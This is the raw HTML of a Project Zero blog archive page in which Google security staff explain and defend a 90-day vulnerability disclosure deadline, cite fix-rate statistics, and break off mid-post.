CINXE.COM
Project Zero: February 2015
<!DOCTYPE html> <html class='v2' dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'> <head> <link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/> <meta content='width=1100' name='viewport'/> <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/> <meta content='blogger' name='generator'/> <link href='https://googleprojectzero.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/> <link href='https://googleprojectzero.blogspot.com/2015/02/' rel='canonical'/> <link rel="alternate" type="application/atom+xml" title="Project Zero - Atom" href="https://googleprojectzero.blogspot.com/feeds/posts/default" /> <link rel="alternate" type="application/rss+xml" title="Project Zero - RSS" href="https://googleprojectzero.blogspot.com/feeds/posts/default?alt=rss" /> <link rel="service.post" type="application/atom+xml" title="Project Zero - Atom" href="https://www.blogger.com/feeds/4838136820032157985/posts/default" /> <!--Can't find substitution for tag [blog.ieCssRetrofitLinks]--> <meta content='https://googleprojectzero.blogspot.com/2015/02/' property='og:url'/> <meta content='Project Zero' property='og:title'/> <meta content='News and updates from the Project Zero team at Google' property='og:description'/> <title>Project Zero: February 2015</title> <style type='text/css'>@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY.eot);}</style> <style id='page-skin-1' type='text/css'><!-- /* ----------------------------------------------- Blogger Template Style Name: Simple Designer: Blogger URL: www.blogger.com ----------------------------------------------- */ /* Variable definitions ==================== <Variable name="keycolor" description="Main Color" type="color" default="#66bbdd"/> <Group description="Page Text" selector="body"> <Variable name="body.font" description="Font" type="font" default="normal normal 12px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> <Variable name="body.text.color" description="Text Color" type="color" default="#222222"/> </Group> <Group description="Backgrounds" selector=".body-fauxcolumns-outer"> <Variable name="body.background.color" description="Outer Background" type="color" default="#66bbdd"/> <Variable name="content.background.color" description="Main Background" type="color" default="#ffffff"/> <Variable name="header.background.color" description="Header Background" type="color" default="transparent"/> </Group> <Group description="Links" selector=".main-outer"> <Variable name="link.color" description="Link Color" type="color" default="#2288bb"/> <Variable name="link.visited.color" description="Visited Color" type="color" default="#888888"/> <Variable name="link.hover.color" description="Hover Color" type="color" default="#33aaff"/> </Group> <Group description="Blog Title" selector=".header h1"> <Variable name="header.font" description="Font" type="font" default="normal normal 60px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> <Variable name="header.text.color" description="Title Color" type="color" default="#3399bb" /> </Group> <Group description="Blog Description" selector=".header .description"> <Variable name="description.text.color" description="Description Color" type="color" default="#777777" /> </Group> <Group description="Tabs Text" selector=".tabs-inner .widget li a"> <Variable name="tabs.font" description="Font" type="font" default="normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> <Variable name="tabs.text.color" description="Text Color" type="color" default="#999999"/> <Variable name="tabs.selected.text.color" description="Selected Color" type="color" default="#000000"/> </Group> <Group description="Tabs Background" selector=".tabs-outer .PageList"> <Variable name="tabs.background.color" description="Background Color" type="color" default="#f5f5f5"/> <Variable name="tabs.selected.background.color" description="Selected Color" type="color" default="#eeeeee"/> </Group> <Group description="Post Title" selector="h3.post-title, .comments h4"> <Variable name="post.title.font" description="Font" type="font" default="normal normal 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> </Group> <Group description="Date Header" selector=".date-header"> <Variable name="date.header.color" description="Text Color" type="color" default="#000000"/> <Variable name="date.header.background.color" description="Background Color" type="color" default="transparent"/> <Variable name="date.header.font" description="Text Font" type="font" default="normal bold 11px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> <Variable name="date.header.padding" description="Date Header Padding" type="string" default="inherit"/> <Variable name="date.header.letterspacing" description="Date Header Letter Spacing" type="string" default="inherit"/> <Variable name="date.header.margin" description="Date Header Margin" type="string" default="inherit"/> </Group> <Group description="Post Footer" selector=".post-footer"> <Variable name="post.footer.text.color" description="Text Color" type="color" default="#666666"/> <Variable name="post.footer.background.color" description="Background Color" type="color" default="#f9f9f9"/> <Variable name="post.footer.border.color" description="Shadow Color" type="color" default="#eeeeee"/> </Group> <Group description="Gadgets" selector="h2"> <Variable name="widget.title.font" description="Title Font" type="font" default="normal bold 11px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/> <Variable name="widget.title.text.color" description="Title Color" type="color" default="#000000"/> <Variable name="widget.alternate.text.color" description="Alternate Color" type="color" default="#999999"/> </Group> <Group description="Images" selector=".main-inner"> <Variable name="image.background.color" description="Background Color" type="color" default="#ffffff"/> <Variable name="image.border.color" description="Border Color" type="color" default="#eeeeee"/> <Variable name="image.text.color" description="Caption Text Color" type="color" default="#000000"/> </Group> <Group description="Accents" selector=".content-inner"> <Variable name="body.rule.color" description="Separator Line Color" type="color" default="#eeeeee"/> <Variable name="tabs.border.color" description="Tabs Border Color" type="color" default="transparent"/> </Group> <Variable name="body.background" description="Body Background" type="background" color="#eeeeee" default="$(color) none repeat scroll top left"/> <Variable name="body.background.override" description="Body Background Override" type="string" default=""/> <Variable name="body.background.gradient.cap" description="Body Gradient Cap" type="url" default="url(https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)"/> <Variable name="body.background.gradient.tile" description="Body Gradient Tile" type="url" default="url(https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)"/> <Variable name="content.background.color.selector" description="Content Background Color Selector" type="string" default=".content-inner"/> <Variable name="content.padding" description="Content Padding" type="length" default="10px" min="0" max="100px"/> <Variable name="content.padding.horizontal" description="Content Horizontal Padding" type="length" default="10px" min="0" max="100px"/> <Variable name="content.shadow.spread" description="Content Shadow Spread" type="length" default="40px" min="0" max="100px"/> <Variable name="content.shadow.spread.webkit" description="Content Shadow Spread (WebKit)" type="length" default="5px" min="0" max="100px"/> <Variable name="content.shadow.spread.ie" description="Content Shadow Spread (IE)" type="length" default="10px" min="0" max="100px"/> <Variable name="main.border.width" description="Main Border Width" type="length" default="0" min="0" max="10px"/> <Variable name="header.background.gradient" description="Header Gradient" type="url" default="none"/> <Variable name="header.shadow.offset.left" description="Header Shadow Offset Left" type="length" default="-1px" min="-50px" max="50px"/> <Variable name="header.shadow.offset.top" description="Header Shadow Offset Top" type="length" default="-1px" min="-50px" max="50px"/> <Variable name="header.shadow.spread" description="Header Shadow Spread" type="length" default="1px" min="0" max="100px"/> <Variable name="header.padding" description="Header Padding" type="length" default="30px" min="0" max="100px"/> <Variable name="header.border.size" description="Header Border Size" type="length" default="1px" min="0" max="10px"/> <Variable name="header.bottom.border.size" description="Header Bottom Border Size" type="length" default="1px" min="0" max="10px"/> <Variable name="header.border.horizontalsize" description="Header Horizontal Border Size" type="length" default="0" min="0" max="10px"/> <Variable name="description.text.size" description="Description Text Size" type="string" default="140%"/> <Variable name="tabs.margin.top" description="Tabs Margin Top" type="length" default="0" min="0" max="100px"/> <Variable name="tabs.margin.side" description="Tabs Side Margin" type="length" default="30px" min="0" max="100px"/> <Variable name="tabs.background.gradient" description="Tabs Background Gradient" type="url" default="url(https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)"/> <Variable name="tabs.border.width" description="Tabs Border Width" type="length" default="1px" min="0" max="10px"/> <Variable name="tabs.bevel.border.width" description="Tabs Bevel Border Width" type="length" default="1px" min="0" max="10px"/> <Variable name="post.margin.bottom" description="Post Bottom Margin" type="length" default="25px" min="0" max="100px"/> <Variable name="image.border.small.size" description="Image Border Small Size" type="length" default="2px" min="0" max="10px"/> <Variable name="image.border.large.size" description="Image Border Large Size" type="length" default="5px" min="0" max="10px"/> <Variable name="page.width.selector" description="Page Width Selector" type="string" default=".region-inner"/> <Variable name="page.width" description="Page Width" type="string" default="auto"/> <Variable name="main.section.margin" description="Main Section Margin" type="length" default="15px" min="0" max="100px"/> <Variable name="main.padding" description="Main Padding" type="length" default="15px" min="0" max="100px"/> <Variable name="main.padding.top" description="Main Padding Top" type="length" default="30px" min="0" max="100px"/> <Variable name="main.padding.bottom" description="Main Padding Bottom" type="length" default="30px" min="0" max="100px"/> <Variable name="paging.background" color="#ffffff" description="Background of blog paging area" type="background" default="transparent none no-repeat scroll top center"/> <Variable name="footer.bevel" description="Bevel border length of footer" type="length" default="0" min="0" max="10px"/> <Variable name="mobile.background.overlay" description="Mobile Background Overlay" type="string" default="transparent none repeat scroll top left"/> <Variable name="mobile.background.size" description="Mobile Background Size" type="string" default="auto"/> <Variable name="mobile.button.color" description="Mobile Button Color" type="color" default="#ffffff" /> <Variable name="startSide" description="Side where text starts in blog language" type="automatic" default="left"/> <Variable name="endSide" description="Side where text ends in blog language" type="automatic" default="right"/> */ /* Content ----------------------------------------------- */ body { font: normal normal 12px Open Sans; color: #000000; background: #eeeeee none repeat scroll top left; padding: 0 0 0 0; } html body .region-inner { min-width: 0; max-width: 100%; width: auto; } h2 { font-size: 22px; } a:link { text-decoration:none; color: #2288bb; } a:visited { text-decoration:none; color: #888888; } a:hover { text-decoration:underline; color: #33aaff; } .body-fauxcolumn-outer .fauxcolumn-inner { background: transparent none repeat scroll top left; _background-image: none; } .body-fauxcolumn-outer .cap-top { position: absolute; z-index: 1; height: 400px; width: 100%; } .body-fauxcolumn-outer .cap-top .cap-left { width: 100%; background: transparent none repeat-x scroll top left; _background-image: none; } .content-outer { -moz-box-shadow: 0 0 0 rgba(0, 0, 0, .15); -webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .15); -goog-ms-box-shadow: 0 0 0 #333333; box-shadow: 0 0 0 rgba(0, 0, 0, .15); margin-bottom: 1px; } .content-inner { padding: 10px 40px; } .content-inner { background-color: #ffffff; } /* Header ----------------------------------------------- */ .header-outer { background: transparent none repeat-x scroll 0 -400px; _background-image: none; } .Header h1 { font: normal normal 40px Open Sans; color: #000000; text-shadow: 0 0 0 rgba(0, 0, 0, .2); } .Header h1 a { color: #000000; } .Header .description { font-size: 18px; color: #000000; } .header-inner .Header .titlewrapper { padding: 22px 0; } .header-inner .Header .descriptionwrapper { padding: 0 0; } /* Tabs ----------------------------------------------- */ .tabs-inner .section:first-child { border-top: 0 solid #dddddd; } .tabs-inner .section:first-child ul { margin-top: -1px; border-top: 1px solid #dddddd; border-left: 1px solid #dddddd; border-right: 1px solid #dddddd; } .tabs-inner .widget ul { background: transparent none repeat-x scroll 0 -800px; _background-image: none; border-bottom: 1px solid #dddddd; margin-top: 0; margin-left: -30px; margin-right: -30px; } .tabs-inner .widget li a { display: inline-block; padding: .6em 1em; font: normal normal 12px Open Sans; color: #000000; border-left: 1px solid #ffffff; border-right: 1px solid #dddddd; } .tabs-inner .widget li:first-child a { border-left: none; } .tabs-inner .widget li.selected a, .tabs-inner .widget li a:hover { color: #000000; background-color: #eeeeee; text-decoration: none; } /* Columns ----------------------------------------------- */ .main-outer { border-top: 0 solid transparent; } .fauxcolumn-left-outer .fauxcolumn-inner { border-right: 1px solid transparent; } .fauxcolumn-right-outer .fauxcolumn-inner { border-left: 1px solid transparent; } /* Headings ----------------------------------------------- */ div.widget > h2, div.widget h2.title { margin: 0 0 1em 0; font: normal bold 11px 'Trebuchet MS',Trebuchet,Verdana,sans-serif; color: #000000; } /* Widgets ----------------------------------------------- */ .widget .zippy { color: #999999; text-shadow: 2px 2px 1px rgba(0, 0, 0, .1); } .widget .popular-posts ul { list-style: none; } /* Posts ----------------------------------------------- */ h2.date-header { font: normal bold 11px Arial, Tahoma, Helvetica, FreeSans, sans-serif; } .date-header span { background-color: #bbbbbb; color: #ffffff; padding: 0.4em; letter-spacing: 3px; margin: inherit; } .main-inner { padding-top: 35px; padding-bottom: 65px; } .main-inner .column-center-inner { padding: 0 0; } .main-inner .column-center-inner .section { margin: 0 1em; } .post { margin: 0 0 45px 0; } h3.post-title, .comments h4 { font: normal normal 22px Open Sans; margin: .75em 0 0; } .post-body { font-size: 110%; line-height: 1.4; position: relative; } .post-body img, .post-body .tr-caption-container, .Profile img, .Image img, .BlogList .item-thumbnail img { padding: 2px; background: #ffffff; border: 1px solid #eeeeee; -moz-box-shadow: 1px 1px 5px rgba(0, 0, 0, .1); -webkit-box-shadow: 1px 1px 5px rgba(0, 0, 0, .1); box-shadow: 1px 1px 5px rgba(0, 0, 0, .1); } .post-body img, .post-body .tr-caption-container { padding: 5px; } .post-body .tr-caption-container { color: #666666; } .post-body .tr-caption-container img { padding: 0; background: transparent; border: none; -moz-box-shadow: 0 0 0 rgba(0, 0, 0, .1); -webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .1); box-shadow: 0 0 0 rgba(0, 0, 0, .1); } .post-header { margin: 0 0 1.5em; line-height: 1.6; font-size: 90%; } .post-footer { margin: 20px -2px 0; padding: 5px 10px; color: #666666; background-color: #eeeeee; border-bottom: 1px solid #eeeeee; line-height: 1.6; font-size: 90%; } #comments .comment-author { padding-top: 1.5em; border-top: 1px solid transparent; background-position: 0 1.5em; } #comments .comment-author:first-child { padding-top: 0; border-top: none; } .avatar-image-container { margin: .2em 0 0; } #comments .avatar-image-container img { border: 1px solid #eeeeee; } /* Comments ----------------------------------------------- */ .comments .comments-content .icon.blog-author { background-repeat: no-repeat; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABIAAAASCAYAAABWzo5XAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEgAACxIB0t1+/AAAAAd0SU1FB9sLFwMeCjjhcOMAAAD+SURBVDjLtZSvTgNBEIe/WRRnm3U8RC1neQdsm1zSBIU9VVF1FkUguQQsD9ITmD7ECZIJSE4OZo9stoVjC/zc7ky+zH9hXwVwDpTAWWLrgS3QAe8AZgaAJI5zYAmc8r0G4AHYHQKVwII8PZrZFsBFkeRCABYiMh9BRUhnSkPTNCtVXYXURi1FpBDgArj8QU1eVXUzfnjv7yP7kwu1mYrkWlU33vs1QNu2qU8pwN0UpKoqokjWwCztrMuBhEhmh8bD5UDqur75asbcX0BGUB9/HAMB+r32hznJgXy2v0sGLBcyAJ1EK3LFcbo1s91JeLwAbwGYu7TP/3ZGfnXYPgAVNngtqatUNgAAAABJRU5ErkJggg==); } .comments .comments-content .loadmore a { border-top: 1px solid #999999; border-bottom: 1px solid #999999; } .comments .comment-thread.inline-thread { background-color: #eeeeee; } .comments .continue { border-top: 2px solid #999999; } /* Accents ---------------------------------------------- */ .section-columns td.columns-cell { border-left: 1px solid transparent; } .blog-pager { background: transparent url(//www.blogblog.com/1kt/simple/paging_dot.png) repeat-x scroll top center; } .blog-pager-older-link, .home-link, .blog-pager-newer-link { background-color: #ffffff; padding: 5px; } .footer-outer { border-top: 1px dashed #bbbbbb; } /* Mobile ----------------------------------------------- */ body.mobile { background-size: auto; } .mobile .body-fauxcolumn-outer { background: transparent none repeat scroll top left; } .mobile .body-fauxcolumn-outer .cap-top { background-size: 100% auto; } .mobile .content-outer { -webkit-box-shadow: 0 0 3px rgba(0, 0, 0, .15); box-shadow: 0 0 3px rgba(0, 0, 0, .15); } .mobile .tabs-inner .widget ul { margin-left: 0; margin-right: 0; } .mobile .post { margin: 0; } .mobile .main-inner .column-center-inner .section { margin: 0; } .mobile .date-header span { padding: 0.1em 10px; margin: 0 -10px; } .mobile h3.post-title { margin: 0; } .mobile .blog-pager { background: transparent none no-repeat scroll top center; } .mobile .footer-outer { border-top: none; } .mobile .main-inner, .mobile .footer-inner { background-color: #ffffff; } .mobile-index-contents { color: #000000; } .mobile-link-button { background-color: #2288bb; } .mobile-link-button a:link, .mobile-link-button a:visited { color: #ffffff; } .mobile .tabs-inner .section:first-child { border-top: none; } .mobile .tabs-inner .PageList .widget-content { background-color: #eeeeee; color: #000000; border-top: 1px solid #dddddd; border-bottom: 1px solid #dddddd; } .mobile .tabs-inner .PageList .widget-content .pagelist-arrow { border-left: 1px solid #dddddd; } --></style> <style id='template-skin-1' type='text/css'><!-- body { min-width: 1120px; } .content-outer, .content-fauxcolumn-outer, .region-inner { min-width: 1120px; max-width: 1120px; _width: 1120px; } .main-inner .columns { padding-left: 0; padding-right: 310px; } .main-inner .fauxcolumn-center-outer { left: 0; right: 310px; /* IE6 does not respect left and right together */ _width: expression(this.parentNode.offsetWidth - parseInt("0") - parseInt("310px") + 'px'); } .main-inner .fauxcolumn-left-outer { width: 0; } .main-inner .fauxcolumn-right-outer { width: 310px; } .main-inner .column-left-outer { width: 0; right: 100%; margin-left: -0; } .main-inner .column-right-outer { width: 310px; margin-right: -310px; } #layout { min-width: 0; } #layout .content-outer { min-width: 0; width: 800px; } #layout .region-inner { min-width: 0; width: auto; } body#layout div.add_widget { padding: 8px; } body#layout div.add_widget a { margin-left: 32px; } --></style> <script type='text/javascript'> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-240546891-1', 'auto', 'blogger'); ga('blogger.send', 'pageview'); </script> <link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4838136820032157985&zx=89189630-7e30-43b5-91d3-8fdab32d43bc' media='none' onload='if(media!='all')media='all'' rel='stylesheet'/><noscript><link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4838136820032157985&zx=89189630-7e30-43b5-91d3-8fdab32d43bc' rel='stylesheet'/></noscript> <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/> <meta name='google-adsense-platform-domain' content='blogspot.com'/> </head> <body class='loading'> <div class='navbar section' id='navbar' name='Navbar'><div class='widget Navbar' data-version='1' id='Navbar1'><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d4838136820032157985\x26blogName\x3dProject+Zero\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dLIGHT\x26layoutType\x3dLAYOUTS\x26searchRoot\x3dhttps://googleprojectzero.blogspot.com/search\x26blogLocale\x3den\x26v\x3d2\x26homepageUrl\x3dhttps://googleprojectzero.blogspot.com/\x26vt\x3d7568236161501195533', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe", messageHandlersFilter: gapi.iframes.CROSS_ORIGIN_IFRAMES_FILTER, messageHandlers: { 'blogger-ping': function() {} } }); } }); </script><script type="text/javascript"> (function() { var script = document.createElement('script'); script.type = 'text/javascript'; script.src = '//pagead2.googlesyndication.com/pagead/js/google_top_exp.js'; var head = document.getElementsByTagName('head')[0]; if (head) { head.appendChild(script); }})(); </script> </div></div> <div class='body-fauxcolumns'> <div class='fauxcolumn-outer body-fauxcolumn-outer'> <div class='cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left'> <div class='fauxborder-right'></div> <div class='fauxcolumn-inner'> </div> </div> <div class='cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </div> <div class='content'> <div class='content-fauxcolumns'> <div class='fauxcolumn-outer content-fauxcolumn-outer'> <div class='cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left'> <div class='fauxborder-right'></div> <div class='fauxcolumn-inner'> </div> </div> <div class='cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </div> <div class='content-outer'> <div class='content-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left content-fauxborder-left'> <div class='fauxborder-right content-fauxborder-right'></div> <div class='content-inner'> <header> <div class='header-outer'> <div class='header-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left header-fauxborder-left'> <div class='fauxborder-right header-fauxborder-right'></div> <div class='region-inner header-inner'> <div class='header section' id='header' name='Header'><div class='widget Header' data-version='1' id='Header1'> <div id='header-inner'> <div class='titlewrapper'> <h1 class='title'> <a href='https://googleprojectzero.blogspot.com/'> Project Zero </a> </h1> </div> <div class='descriptionwrapper'> <p class='description'><span>News and updates from the Project Zero team at Google</span></p> </div> </div> </div></div> </div> </div> <div class='header-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </header> <div class='tabs-outer'> <div class='tabs-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left tabs-fauxborder-left'> <div class='fauxborder-right tabs-fauxborder-right'></div> <div class='region-inner tabs-inner'> <div class='tabs no-items section' id='crosscol' name='Cross-Column'></div> <div class='tabs no-items section' id='crosscol-overflow' name='Cross-Column 2'></div> </div> </div> <div class='tabs-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <div class='main-outer'> <div class='main-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left main-fauxborder-left'> <div class='fauxborder-right main-fauxborder-right'></div> <div class='region-inner main-inner'> <div class='columns fauxcolumns'> <div class='fauxcolumn-outer fauxcolumn-center-outer'> <div class='cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left'> <div class='fauxborder-right'></div> <div class='fauxcolumn-inner'> </div> </div> <div class='cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <div class='fauxcolumn-outer fauxcolumn-left-outer'> <div class='cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left'> <div class='fauxborder-right'></div> <div class='fauxcolumn-inner'> </div> </div> <div class='cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <div class='fauxcolumn-outer fauxcolumn-right-outer'> <div class='cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left'> <div class='fauxborder-right'></div> <div class='fauxcolumn-inner'> </div> </div> <div class='cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <!-- corrects IE6 width calculation --> <div class='columns-inner'> <div class='column-center-outer'> <div class='column-center-inner'> <div class='main section' id='main' name='Main'><div class='widget Blog' data-version='1' id='Blog1'> <div class='blog-posts hfeed'> <div class="date-outer"> <h2 class='date-header'><span>Friday, February 13, 2015</span></h2> <div class="date-posts"> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='4838136820032157985' itemprop='blogId'/> <meta content='6442115564148136286' itemprop='postId'/> <a name='6442115564148136286'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='https://googleprojectzero.blogspot.com/2015/02/feedback-and-data-driven-updates-to.html'>Feedback and data-driven updates to Google’s disclosure policy</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-6442115564148136286' itemprop='description articleBody'> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Posted by Chris Evans and Ben Hawkes, </span><a href="http://googleprojectzero.blogspot.com/2014/07/announcing-project-zero.html" style="line-height: 1.38; text-decoration: none;"><span style="color: #1155cc; font-family: Arial; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Project Zero</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">; Heather Adkins, Matt Moore and Michal Zalewski, Google Security; Gerhard Eschelbeck, Vice President, Google Security</span></div> <b id="docs-internal-guid-33d612fd-841b-c1fa-aaed-6d642687fefb" style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Disclosure deadlines have long been an industry standard practice. They improve end-user security by getting security patches to users faster. As noted in </span><a href="https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CERT’s 45-day disclosure policy</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, they also “balance the need of the public to be informed of security vulnerabilities with vendors' need for time to respond effectively”. </span><a href="http://yahoopolicy.tumblr.com/post/104777538533/users-first-our-vulnerability-disclosure-policy" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Yahoo!’s 90-day policy</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> notes that “Time is of the essence when we discover these types of issues: the more quickly we address the risks, the less harm an attack can cause”. </span><a href="http://www.zerodayinitiative.com/advisories/disclosure_policy/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">ZDI’s 120-day policy</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> notes that releasing vulnerability details can “enable the defensive community to protect the user”.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deadlines also acknowledge an uncomfortable fact that is alluded to by some of the above policies: the offensive security community invests considerably more into vulnerability research than the defensive community. Therefore, when we find a vulnerability in a high profile target, it is often already known by advanced and stealthy actors.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <a href="http://googleprojectzero.blogspot.com/2014/07/announcing-project-zero.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Project Zero</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> has adhered to a 90-day disclosure deadline. Now we are applying this approach for the rest of Google as well. We notify vendors of vulnerabilities immediately, with details shared in public with the defensive community after 90 days, or sooner if the vendor releases a fix. We’ve chosen a middle-of-the-road deadline timeline and feel it’s reasonably calibrated for the current state of the industry.</span></div> <b style="font-weight: normal;"><br /></b> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To see how things are going, we crunched some data on Project Zero’s disclosures to date. For example, the Adobe Flash team probably has the largest install base and number of build combinations of any of the products we’ve researched so far. To date, they have </span><a href="https://code.google.com/p/google-security-research/issues/list?can=1&q=status%3AFixed+product%3Dflash&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">fixed 37 Project Zero vulnerabilities</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (or 100%) within the 90-day deadline. More generally, of 154 Project Zero bugs fixed so far, 85% were fixed within 90 days. Restrict this to the 73 issues filed and fixed after Oct 1st, 2014, and 95% were fixed within 90 days. Furthermore, recent </span><a href="https://code.google.com/p/google-security-research/issues/detail?id=123" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">well-discussed</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><a href="https://code.google.com/p/google-security-research/issues/detail?id=135" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">deadline</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: 